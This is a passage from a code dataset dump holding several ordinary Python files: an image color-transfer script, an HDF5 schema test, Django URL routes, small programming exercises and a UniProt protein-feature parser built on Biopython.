image\n :param target_color_image: a numpy array, HxW, 0 or 255, uint8\n :param target_color_image_mask: a numpy array, HxW, 0 or 255, uint8\n :param protocol: cv2 protocol (e.g. cv2.COLOR_RGB2LAB)\n :param protocol_reverse: cv2 protocol (e.g. cv2.COLOR_LAB2RGB)\n :param calc_channel: if False in certain dim, skip that channel\n :return image_transfered: color transfered image, a numpy array, uint8\n \"\"\"\n\n # if no mask, use whole image\n if type(image_mask) != np.ndarray:\n image_mask = np.ones((image.shape[0], image.shape[1])).astype(np.uint8) * 255\n if type(target_color_image_mask) != np.ndarray:\n target_color_image_mask = np.ones((target_color_image.shape[0], target_color_image.shape[1])).astype(np.uint8) * 255\n\n target_color_hsv = cv2.cvtColor(target_color_image, protocol)\n target_mean, target_std = cv2.meanStdDev(target_color_hsv, mask=target_color_image_mask)\n\n\n # if LAB channel, and its pure color, then set std to [10, 1, 1]\n if protocol == cv2.COLOR_RGB2LAB:\n target_std[0] = 10 if target_std[0] == 0 else target_std[0]\n target_std[1] = 1 if target_std[1] == 0 else target_std[1]\n target_std[2] = 1 if target_std[2] == 0 else target_std[2]\n\n\n image_hsv = cv2.cvtColor(image, protocol)\n image_transformed_hsv = color_transfer(image_hsv, image_mask, target_mean, target_std, calc_channel)\n image_transformed = cv2.cvtColor(image_transformed_hsv, protocol_reverse)\n\n return image_transformed\n\n\nif __name__ == '__main__':\n\n from get_mask import get_mask\n\n img_path = './data/img.png'\n img_mask_path = './data/img.json'\n target_color_img_path = './data/color.jpg'\n target_color_img_mask_path = './data/color.json'\n\n img = np.array(Image.open(img_path).convert('RGB'))\n img_mask = get_mask(img_path, img_mask_path)\n target_color_img = np.array(Image.open(target_color_img_path).convert('RGB'))\n target_color_img_mask = get_mask(target_color_img_path, target_color_img_mask_path)\n\n img_transformed = color_transfer_wrapper(img, target_color_img,\n cv2.COLOR_RGB2LAB, cv2.COLOR_LAB2RGB,\n image_mask=img_mask,\n target_color_image_mask=target_color_img_mask,\n calc_channel=[True, True, True])\n\n img_transformed_pil = Image.fromarray(img_transformed)\n img_transformed_pil.save('output.png')\n\n plt.figure(figsize=(20, 8))\n plt.subplot(151); plt.imshow(img); plt.title('image'); plt.axis('off')\n plt.subplot(152); plt.imshow(img_mask); plt.title('mask'); plt.axis('off')\n plt.subplot(153); plt.imshow(target_color_img); plt.title('target color'); plt.axis('off')\n plt.subplot(154); plt.imshow(target_color_img_mask); plt.title('target color mask'); plt.axis('off')\n plt.subplot(155); plt.imshow(img_transformed); plt.title('transformed'); plt.axis('off')\n plt.tight_layout()\n plt.savefig('output_concat.png')\n","sub_path":"pattern_changer/color_changer.py","file_name":"color_changer.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"99565274","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# michael a.g. aïvázis \n# (c) 1998-2023 all rights reserved\n\n\n\"\"\"\nCheck that we can decorate groups with schema\n\"\"\"\n\n\ndef test():\n # support\n import pyre\n\n # declare the metadata group layout\n class Meta(pyre.h5.schema.group):\n \"\"\"\n A group of datasets in some HDF5 file\n \"\"\"\n\n # something simple\n id = pyre.h5.schema.int()\n id.__doc__ = \"a simple dataset\"\n\n # something a bit more complicated\n pols = pyre.h5.schema.strings()\n pols.default = \"HH\", \"VV\"\n pols.__doc__ = \"a dataset that's a container\"\n\n # and the main group layout\n class Group(pyre.h5.schema.group):\n \"\"\"\n The top level group\n \"\"\"\n\n # add the metadata\n meta = Meta()\n\n # now, make a group with this layout\n g = pyre.h5.api.group(at=\"/\", layout=Group())\n\n # it has no members\n assert tuple(g._pyre_contents) == ()\n # no subgroups\n assert tuple(g._pyre_groups()) == ()\n # no datasets\n assert tuple(g._pyre_datasets()) == ()\n # and no locations\n assert tuple(g._pyre_locations()) == ()\n\n # all done\n return g\n\n\n# main\nif __name__ == \"__main__\":\n # drive\n test()\n\n\n# end of file\n","sub_path":"tests/pyre.pkg/h5/api/group_subgroup.py","file_name":"group_subgroup.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"555010538","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('mangas/', views.mangas, name='mangas'),\n path('figuras/', views.figuras, name='figuras'),\n path('registro/', views.registro, name='registro'),\n path('listado-Mangakas/', views.listado_mangakas, name='listado_mangakas'),\n path('nuevo-mangaka/', views.crear_mangaka, name='crear_mangakas'),\n path('modificar-mangaka//', views.modificar_mangaka, name='modificar_mangaka'),\n path('eliminar-mangaka//', views.eliminar_mangaka, name='eliminar_mangaka'),\n path('listado-Mangas/', views.listado_mangas, name='listado_mangas'),\n path('nuevo-manga/', views.crear_mangas, name='crear_mangas'),\n path('modificar-manga//', views.modificar_mangas, name='modificar_mangas'),\n path('eliminar-manga//', views.eliminar_mangas, name='eliminar_mangas'),\n path('listado-Figuras/', views.listado_figuras, name='listado_figuras'),\n path('nuevo-figura/', views.crear_figuras, name='crear_figuras'),\n path('modificar-figura//', views.modificar_figura, name='modificar_figura'),\n path('eliminar-figura//', views.eliminar_figura, name='eliminar_figura'),\n path('contacto/' ,views.contacto, name='contacto'),\n path('listado-recetas/', views.listado_recetas, name='listado_recetas'),\n path('nueva-receta/', views.crear_recetas, name='nueva_receta'),\n path('modificar-recetas//', views.modificar_recetas, name='modificar_recetas'),\n path('eliminar-recetas//', views.eliminar_recetas, name='eliminar_recetas'),\n]\nurlpatterns +=[\n \n]","sub_path":"nenuko/catalogo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527334480","text":"# -*- coding: utf-8 -*-\n\n\n# 08. 暗号文\n# 与えられた文字列の各文字を,以下の仕様で変換する関数cipherを実装せよ.\n\n# 英小文字ならば(219 - 文字コード)の文字に置換\n# その他の文字はそのまま出力\n# この関数を用い,英語のメッセージを暗号化・復号化せよ.\n\n# 参考\n# http://python.civic-apps.com/char-ord/\n\n\n\n\ndef cipher(chars,method):\n if method == \"encryption\":\n return [chr(219 - ord(c)) if 97 <= ord(c) <= 122 else c for c in chars]\n else:\n return [chr(219 - ord(c)) if (219 - 122) <= ord(c) <= (219 - 97) else c for c in chars]\n\n\nprint(\"\".join(cipher(\"ABCabc123\",\"encryption\")))\nprint(\"\".join(cipher(\"ABCzyx123\",\"decryption\")))\n\n","sub_path":"chapter_1/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"425113476","text":"class Mario():\n def __init__(self, star):\n self.mario_x = 0\n self.mario_y = 0\n\n self.star_x = star[0]\n self.star_y = star[1]\n\n self.points = 0\n\n def check_star(self):\n if (self.mario_x == self.star_x and self.mario_y == self.star_y):\n self.points += 1\n\n def down(self):\n self.mario_y -= 1\n self.check_star()\n\n def left(self):\n self.mario_x -= 1\n self.check_star()\n\n def up(self):\n self.mario_y += 1\n self.check_star()\n\n def right(self):\n self.mario_x += 1\n self.check_star()\n\n def simulate(self, moves):\n mario = Mario([0, 2])\n for move in moves:\n if move == 'U':\n mario.up()\n elif move == 'L':\n mario.left()\n elif move == 'D':\n mario.down()\n elif move == 'R':\n mario.right()\n return mario.points\n\n\nwith open('../9/moves-1.txt') as f:\n moves = f.readline()\n print(Mario((0, 2)).simulate(moves))\n","sub_path":"session-9/homework_solution/9-2.py","file_name":"9-2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"352877341","text":"\"\"\"\nReturn the root node of a binary search tree that matches the given preorder traversal.\n\n(Recall that a binary search tree is a binary tree where for every node, any descendant of node.left has a value < node.val, and any descendant of node.right has a value > node.val. Also recall that a preorder traversal displays the value of the node first, then traverses node.left, then traverses node.right.)\n\nIt's guaranteed that for the given test cases there is always possible to find a binary search tree with the given requirements.\n\nExample 1:\n Input: [8,5,1,7,10,12]\n Output: [8,5,10,1,7,null,12]\n\nConstraints:\n 1 <= preorder.length <= 100\n 1 <= preorder[i] <= 10^8\n The values of preorder are distinct.\n\"\"\"\n\nfrom binarytree import Node\ndef bstFromPreorder(preorder):\n node = Node(preorder[0])\n if len(preorder) == 1:\n return node\n right_tree_root = None\n for i in range(1, len(preorder)):\n if preorder[i] > preorder[0]:\n right_tree_root = i\n break\n if right_tree_root != None:\n if right_tree_root >= 2:\n node.left = bstFromPreorder(preorder[1: right_tree_root])\n node.right = bstFromPreorder(preorder[right_tree_root:])\n else:\n node.left = bstFromPreorder(preorder[1:])\n return node\n\np1 = [8,5,1,7,10,12]\nprint(bstFromPreorder(p1))\n","sub_path":"LeetCode-Python/1008 Construct Binary Search Tree from Preorder Traversal.py","file_name":"1008 Construct Binary Search Tree from Preorder Traversal.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"301304935","text":"#!/usr/bin/env python \n\"\"\"Parses the XML scheme of a uniprot protein and provides a python API \nfor quering and accessing the results \n\"\"\"\n# load the modules \nfrom __future__ import annotations\nimport numpy as np \nfrom Bio import SeqIO\nimport urllib\nimport os \nfrom typing import List, Tuple, Dict, Union\nclass Features:\n r\"\"\"The class provides a template for the features associated with a protein. \\\n The following features are associated with the protein \\ \n #signal peptide: dict \\\n The range of the signal peptides, if the protein has no signal, for example, a globular \\\n cytologic protein. None is used as a default, placeholder \\\n value. \\ \n #chains:dict \\ \n the chains making up the mature protein, the protein should at least have one chain. \\ \n #domain: dict\\ \n the known domains in the protein, if no domain is defined, None is used. \\ \n #modification sites: nested dict \\ \n that contains information about the PTM sites, glycosylation site and disulfide bonds. \\ \n #sequence variances: dict \\ \n which contains information about the sequence variants of a protein structure. \\ \n #split variance: dict \\ \n which contain known splice variants \\ \n ** Notes: Although disulfide bond is not a PTMs, it is being treated as a \\ \n one here to simplify the workflow. \\ \n \"\"\"\n def __init__(self,uniprot_id:str, temp_dir: str = None)->Features:\n \"\"\"Download the features associated with a protein from uniprot and then parse the results using SeqIO to extract the features\n \n :param uniprot_id: Uniprot id to download its XML scheme from Uniprot \n :type uniprot_id: str \n :param temp_dir: a temporary directory to download the XML scheme to it, if not provided files are download to the current working directory, defaults to None.\n :type temp_dir: str\n \"\"\"\n # download the files \n if temp_dir is None: \n temp_dir=\".\" \n # define the file path \n file_path: str = os.path.join(temp_dir,f\"{uniprot_id}.xml\")\n try: \n urllib.request.urlretrieve(f\"https://www.uniprot.org/uniprot/{uniprot_id}.xml\", file_path) \n except urllib.error.HTTPError: \n raise IOError(\"Downloading the provided fail, Check your provided uniprot id\")\n # read the sequence object \n record: SeqIO.SeqRecord = SeqIO.read(file_path,\"uniprot-xml\")\n # fill the provided record \n self.extracted_features=dict()\n # parse the features in the record.feature object\n for feature in record.features:\n # extract sequences signal peptide\n if feature.qualifiers[\"type\"]==\"signal peptide\":\n # Try to extract the start and end position for the chain\n # if this could no be extracted None is used as a default value\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"SignalPeptide\"]={\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n # extract the chain information\n elif feature.qualifiers[\"type\"]==\"chain\":\n if \"Chains\" in self.extracted_features.keys():\n chainIdx=len(self.extracted_features[\"Chains\"]) # get the chain index\n chainName=\"chain_number_\"+str(chainIdx)\n # Try to extract the start and end position for the chain\n # if this colud no be extracted None is used as a default value\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n \n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"Chains\"][chainName]={\n \"chainId\":feature.id,\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n else:\n \n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n \n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n \n self.extracted_features[\"Chains\"]={\n \"chain_number_0\":{\n \"chainId\":feature.id,\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }}\n # extract the domain information\n elif feature.qualifiers[\"type\"]==\"domain\":\n if \"Domains\" in self.extracted_features.keys():\n self.extracted_features[\"Domains\"][\n feature.qualifiers[\"description\"]]={\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)}\n else: \n self.extracted_features[\"Domains\"]={\n feature.qualifiers[\"description\"]:{\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n }\n # extract transmembrane features:\n elif feature.qualifiers[\"type\"]=='transmembrane region':\n if \"transmembrane_region\" in self.extracted_features.keys():\n self.extracted_features[\"transmembrane_region\"].append((int(feature.location.start),int(feature.location.end)))\n else:\n self.extracted_features[\"transmembrane_region\"]=[(int(feature.location.start),int(feature.location.end))]\n # extract the topological information:\n elif feature.qualifiers[\"type\"]==\"modified residue\":\n if \"PTMs\" in self.extracted_features.keys():\n if \"Modifications\" in self.extracted_features[\"PTMs\"].keys():\n modificationIdx=len(self.extracted_features[\"PTMs\"][\n \"Modifications\"])\n modificationName=\"SeqModification_num_\"+str(modificationIdx)\n self.extracted_features[\"PTMs\"][\"Modifications\"][\n modificationName]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"PTMs\"][\"Modifications\"]={}\n self.extracted_features[\"PTMs\"][\"Modifications\"][\n \"SeqModification_num_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else: \n self.extracted_features[\"PTMs\"]={}\n self.extracted_features[\"PTMs\"][\"Modifications\"]={}\n self.extracted_features[\"PTMs\"][\"Modifications\"][\n \"SeqModification_num_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract and add glycosylation sites to the features class\n elif feature.qualifiers[\"type\"]==\"glycosylation site\":\n if \"PTMs\" in self.extracted_features.keys():\n if \"GlycoSite\" in self.extracted_features[\"PTMs\"].keys():\n glycositeIdx=len(self.extracted_features[\"PTMs\"][\"GlycoSite\"])\n glyco_site_name=\"Glyco_Site_number_\"+str(glycositeIdx)\n self.extracted_features[\"PTMs\"][\"GlycoSite\"][\n glyco_site_name]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"PTMs\"][\"GlycoSite\"]={}\n self.extracted_features[\"PTMs\"][\"GlycoSite\"][\n \"Glyco_Site_number_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"PTMs\"]={}\n self.extracted_features[\"PTMs\"][\"GlycoSite\"]={}\n self.extracted_features[\"PTMs\"][\"GlycoSite\"][\n \"Glyco_Site_number_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract and add disulfide site to the feature class\n elif feature.qualifiers[\"type\"]==\"disulfide bond\":\n if \"PTMs\" in self.extracted_features.keys():\n if \"DisulfideBond\" in self.extracted_features[\"PTMs\"].keys():\n disulfideBondIdx=len(self.extracted_features[\"PTMs\"][\"DisulfideBond\"])\n disulfide_site_name=\"disulfide_site_number_\"+str(disulfideBondIdx)\n # try to extract the start and the end position.\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"][\n disulfide_site_name]={\n \"Name\":feature.qualifiers[\"type\"],\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n else:\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"]={}\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"][\n \"disulfide_site_number_0\"]={\n \"Name\":feature.qualifiers[\"type\"],\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n else:\n self.extracted_features[\"PTMs\"]={}\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"]={}\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"][\n \"disulfide_site_number_0\"]={\n \"Name\":feature.qualifiers[\"type\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract sequence variant from the protein sequence:\n elif feature.qualifiers[\"type\"]==\"sequence variant\":\n if \"SeqVar\" in self.extracted_features.keys():\n varient_index=len( self.extracted_features[\"SeqVar\"])\n varient_name=\"Sequence_varient_number_\"+str(varient_index)\n # check if the feature has a description entrey\n if \"description\" in feature.qualifiers.keys():\n snp_id=feature.qualifiers[\"description\"]\n else:\n snp_id=None\n # check if the feature has a original entrey\n if \"original\" in feature.qualifiers.keys():\n original_amino_acid=feature.qualifiers[\"original\"]\n else:\n original_amino_acid=None\n # check if the feature has a varient entrey\n if \"variation\" in feature.qualifiers.keys():\n varient_amino_acid=feature.qualifiers[\"variation\"]\n else:\n varient_amino_acid=None\n # fill the entries\n self.extracted_features[\"SeqVar\"][varient_name]={\n \"VarientId\":feature.qualifiers[\"id\"],\n \"SNP_Id\":snp_id,\n \"original\":original_amino_acid,\n \"variation\":varient_amino_acid,\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"SeqVar\"]={}\n if \"description\" in feature.qualifiers.keys():\n snp_id=feature.qualifiers[\"description\"]\n else:\n snp_id=None\n # check if the feature has a description entrey\n if \"description\" in feature.qualifiers.keys():\n snp_id=feature.qualifiers[\"description\"]\n else:\n snp_id=None\n # check if the feature has a original entrey\n if \"original\" in feature.qualifiers.keys():\n original_amino_acid=feature.qualifiers[\"original\"]\n else:\n original_amino_acid=None\n # check if the feature has a varient entrey\n if \"variation\" in feature.qualifiers.keys():\n varient_amino_acid=feature.qualifiers[\"variation\"]\n else:\n varient_amino_acid=None\n self.extracted_features[\"SeqVar\"][\n \"Sequence_varient_number_0\"]={\n \"VarientId\":feature.qualifiers[\"id\"],\n \"SNP_Id\":snp_id,\n \"original\":original_amino_acid,\n \"variation\":varient_amino_acid,\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract splice vaients from the protein sequences: \n elif feature.qualifiers[\"type\"]==\"splice variant\":\n if \"SpliceVar\" in self.extracted_features.keys():\n SpliceVarIdx=len(self.extracted_features[\"SpliceVar\"])\n spliceVarient_name=\"splice_varient_number_\"+str(SpliceVarIdx)\n self.extracted_features[\"SpliceVar\"][spliceVarient_name]={\n \"Name\":feature.qualifiers[\"id\"],\n \"Isoform\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else: \n self.extracted_features[\"SpliceVar\"]={}\n self.extracted_features[\"SpliceVar\"][\n \"splice_varient_number_0\"]={\n \"Name\":feature.qualifiers[\"id\"],\n \"Isoform\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # fill in the empty object with None:\n if \"SignalPeptide\" not in self.extracted_features.keys():\n self.extracted_features[\"SignalPeptide\"]=None\n if \"Chains\" not in self.extracted_features.keys():\n self.extracted_features[\"Chains\"]=None\n if \"Domains\" not in self.extracted_features.keys():\n self.extracted_features[\"Domains\"]=None\n if \"PTMs\" not in self.extracted_features.keys():\n self.extracted_features[\"PTMs\"]=None\n else:\n if \"Modifications\" not in self.extracted_features[\"PTMs\"].keys():\n self.extracted_features[\"PTMs\"][\"Modifications\"]=None \n if \"GlycoSite\" not in self.extracted_features[\"PTMs\"].keys():\n self.extracted_features[\"PTMs\"][\"GlycoSite\"]=None \n if \"DisulfideBond\" not in self.extracted_features[\"PTMs\"].keys():\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"]=None \n if \"SeqVar\" not in self.extracted_features.keys():\n self.extracted_features[\"SeqVar\"]=None\n if \"SpliceVar\" not in self.extracted_features.keys():\n self.extracted_features[\"SpliceVar\"]=None\n if 'transmembrane_region' not in self.extracted_features.keys():\n self.extracted_features[\"transmembrane_region\"]=None\n return \n # accessor methods:\n def has_signal_peptide(self)->bool:\n \"\"\"\n :return: True if the protein has a signal peptide and False other wise.\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"SignalPeptide\"]==None:\n return False\n return True\n \n def get_signal_peptide_index(self)->Tuple[int,int]:\n \"\"\"\n :return: The Index of the signal-peptide in the protein, if not signal peptide is defined, it returns None\n :rtype: Tuple[int,int]\n \"\"\"\n if self.extracted_features[\"SignalPeptide\"]==None:\n return None,None\n startIdx=self.extracted_features[\"SignalPeptide\"][\"startIdx\"]\n endIdx=self.extracted_features[\"SignalPeptide\"][\"endIdx\"]\n return startIdx,endIdx\n \n def has_chains(self)->bool:\n \"\"\"\n :return: True if the protein has/have chain/chains as feature and False otherwise.\n :rtype: [type]\n \"\"\"\n if self.extracted_features[\"Chains\"]==None:\n return False\n return True\n \n def get_number_chains(self) -> int:\n \"\"\"\n :return: The number of chains in the protein. if no chain is defined it returns zero.\n :rtype: int\n \"\"\"\n if not self.has_chains():\n return 0\n return len(self.extracted_features[\"Chains\"])\n \n def get_chains(self)->Dict[Dict[str,Union[str,int]]]:\n \"\"\"\n :return: A dictionary that contains the chains of the protein, if no chain is defined it return None\n :rtype: Dict[Dict[str,Union[str,int]]]\n \"\"\"\n return self.extracted_features[\"Chains\"]\n \n def has_transmembrane_domains(self)->bool:\n \"\"\"\n Returns:\n bool: True if the protein has transmembrane region and false otherwise\n \"\"\"\n return self.extracted_features[\"transmembrane_region\"]!=None\n\n def get_transmembrane_regions(self)->List[Tuple[int,int]]:\n \"\"\"return a list containing the boundaries of transmembrane regions in the protein \n\n Returns:\n List[Tuple[int,int]]: a list containing the boundaries of transmembrane regions in the protein \n \"\"\"\n return self.extracted_features[\"transmembrane_region\"]\n \n def get_num_transmembrane_regions(self)->int:\n \"\"\"Return the number of transmembrane regions on the protein \n\n Returns:\n int: Return the number of transmembrane regions on the protein\n \"\"\"\n print()\n if self.extracted_features[\"transmembrane_region\"]!=None:\n return len(self.get_transmembrane_regions())\n return 0\n\n def has_domains(self)->bool: \n \"\"\"\n :return: True if the protein has a defined domain/domains, otherwise it return False.\n :rtype: bool \n \"\"\"\n return self.extracted_features[\"Domains\"]!=None\n \n def get_number_domains(self)->int:\n \"\"\"\n :return: The number of domains a protein has, if no domain is defined it returns zero.\n :rtype: int\n \"\"\"\n if self.extracted_features[\"Domains\"] ==None:\n return 0\n return len(self.extracted_features[\"Domains\"])\n \n def get_domains(self)->Dict[str, Dict[str, int]]:\n \"\"\"\n :return: The domains defined in the protein sequence, if no domain is defined it returns None.\n :rtype: Dict[str, Dict[str, int]]\n \"\"\"\n return self.extracted_features[\"Domains\"]\n \n def has_PTMs(self)->bool:\n \"\"\"\n :return:True if the protein has a PTMs and False other wise\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"PTMs\"] ==None:\n return False\n return True\n\n def has_disulfide_bond(self)->bool:\n \"\"\"\n :return: True is the protein has disulfide and False other wise\n :rtype: bool\n \"\"\"\n if self.has_PTMs():\n if self.extracted_features[\"PTMs\"][\"DisulfideBond\"]==None:\n return False\n else: \n return True\n return False\n \n def has_glycosylation_site(self)->bool:\n \"\"\"\n :return: True if the protein has a glycosylation site and False otherwise.\n :rtype: [type]\n \"\"\"\n if self.has_PTMs():\n if self.extracted_features[\"PTMs\"][\"GlycoSite\"] == None:\n return False\n else:\n return True\n return False\n \n def has_site_modifications(self)->bool:\n \"\"\"\n :return: True if the protein has a modification site and False otherwise\n :rtype: bool\n \"\"\"\n if self.has_PTMs():\n if self.extracted_features[\"PTMs\"][\"Modifications\"] == None:\n return False\n else:\n return True\n return False\n \n def get_PTMs(self)->Dict[str,Dict[str,Dict[str,Union[str,int]]]]:\n \"\"\"\n :return: a nested dictionary that contains the PTMs found within the protein \\\n the PTMs are classified into three main categories:\n\n 1- Modifications: which is the generic case and contain information \\\n about any sequence modification beside disulfide bonds and glycosylation.\n \n 2- glycosylation: contains information about glycosylation sites\n \n 3- DisulfideBond: contains information about disulfide bond\n\n :rtype: Dict[str,Dict[str,Dict[str,Union[str,int]]]]\n \"\"\"\n return self.extracted_features[\"PTMs\"]\n \n def get_PTMs_modifications(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: The generic modifications found on the protein. If the protein has no PTM, the function returns None.\n :rtype: Dict[str,Dict[str,Union[str,int]]]\n \"\"\"\n if self.extracted_features[\"PTMs\"] is None: return None\n if \"Modifications\" in self.extracted_features[\"PTMs\"].keys():\n return self.extracted_features[\"PTMs\"][\"Modifications\"]\n return None\n \n def get_PTMs_glycosylation(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: The glycosylation sites found on the protein. If the protein has no glycosylation sites, the function returns None.\n :rtype: [type]\n \"\"\"\n if self.extracted_features[\"PTMs\"] is None: return None \n return self.extracted_features[\"PTMs\"][\"GlycoSite\"]\n \n def get_disulfide_bonds(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: The disulfide sites found on the protein. If the protein has no disulfide sites, the function returns None\n :rtype: [type]\n \"\"\"\n if self.extracted_features[\"PTMs\"] is None: return None\n return self.extracted_features[\"PTMs\"][\"DisulfideBond\"]\n \n def get_number_PTMs(self)->int:\n \"\"\"\n :return: The number of PTMs the sequence has, this include di-sulfide bonds. See Note1 for more details. \\\n If the protein has no PTMs the function returns zero\n :rtype: int\n \"\"\"\n if not self.has_PTMs():\n return 0\n else:\n number_of_PTMs=self.get_number_modifications()+self.get_number_glycosylation_sites()+self.get_number_disulfide_bonds()\n return number_of_PTMs\n \n def get_number_modifications(self)->int:\n \"\"\"\n :return: Returns the total number of generic modifications found on the protein. \\\n if no modification is found it return 0\n :rtype: int\n \"\"\"\n if not self.has_site_modifications():\n return 0\n else:\n return len(self.get_PTMs_modifications())\n \n def get_number_glycosylation_sites(self)->int:\n \"\"\"\n :return: The number of glycosylation_sites the protein has, if the protein has no glycosylation sites, the function returns zero\n :rtype: int\n \"\"\"\n if not self.has_glycosylation_site():\n return 0\n else:\n return len(self.get_PTMs_glycosylation())\n \n def get_number_disulfide_bonds(self)->int:\n \"\"\"\n :return: The number of disulfide bonds the protein has, if the protein has no disulfide bonds, the function return zero.\n :rtype: int\n \"\"\"\n if not self.has_disulfide_bond():\n return 0\n else:\n return len(self.get_disulfide_bonds())\n \n def has_sequence_variants(self) ->bool:\n \"\"\"\n :return: True if the protein has a sequence variants, and False otherwise.\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"SeqVar\"] == None:\n return False\n else: \n return True\n \n def get_sequence_variants(self) -> Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: A dict object that contains all sequence variants within a protein, if the protein has no sequence variants the function returns None.\n :rtype: Dict[str,Dict[str,Union[str,int]]]\n \"\"\"\n return self.extracted_features[\"SeqVar\"]\n \n def get_number_sequence_variants(self)->int:\n \"\"\"\n :return: The number of sequence variants the protein has, if the protein has no sequence varient, the function returns 0.\n :rtype: int\n \"\"\"\n if not self.has_sequence_variants():\n return 0\n else:\n return len(self.get_sequence_variants())\n \n def has_splice_variants(self)->bool:\n \"\"\"\n :return: True if the sequence has a splice variants and False otherwise.\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"SpliceVar\"]==None:\n return False\n else:\n return True\n \n def get_splice_variants(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: A dict object that contains the splice variants. If the protein has no splice variants the function returns None.\n :rtype: Dict[str,Dict[str,Union[str,int]]]\n \"\"\"\n return self.extracted_features[\"SpliceVar\"]\n \n def get_number_splice_variants(self)->int:\n \"\"\"\n :return: The number of slice variants in the protein, if the protein has no splice variants, the function returns zero.\n :rtype: int\n \"\"\"\n if not self.has_splice_variants():\n return 0\n else:\n return len(self.get_splice_variants())\n \n def summary(self)->Dict[str,Union[str,int]]:\n \"\"\"\n :return: The function return a dict object that summarizes the features of the protein.\n :rtype: Dict[str,Union[str,int]]\n \"\"\"\n summary=dict()\n summary[\"has_signal_peptide\"]=self.has_signal_peptide()\n summary[\"number_of_chains\"]=self.get_number_chains()\n summary[\"number_of_domains\"]=self.get_number_domains()\n summary[\"number_of_PTMs\"]=self.get_number_PTMs()\n summary[\"number_of_modifications\"]=self.get_number_modifications()\n summary[\"number_of_glycosylation_sites\"]=self.get_number_glycosylation_sites()\n summary[\"number_of_disulfide_bonds\"]=self.get_number_disulfide_bonds()\n summary[\"number_of_sequence_varients\"]=self.get_number_sequence_variants()\n summary[\"number_of_splice_varients\"]=self.get_number_splice_variants()\n summary[\"number_of_transmembrane_regions\"]=self.get_num_transmembrane_regions()\n return summary\n \n def __str__(self)->str:\n \"\"\"\n The string representation of the class\n Returns\n -------\n the string representation of the class\n \"\"\"\n summary=self.summary()\n string_rep=\"\"\" A protein feature instance with: {} chains, {} transmembrane regions, {} domains. {} PTMs, {} sequence variants and {} splice variants\"\"\".format(\n summary[\"number_of_chains\"],summary[\"number_of_transmembrane_regions\"],summary[\"number_of_domains\"],\n 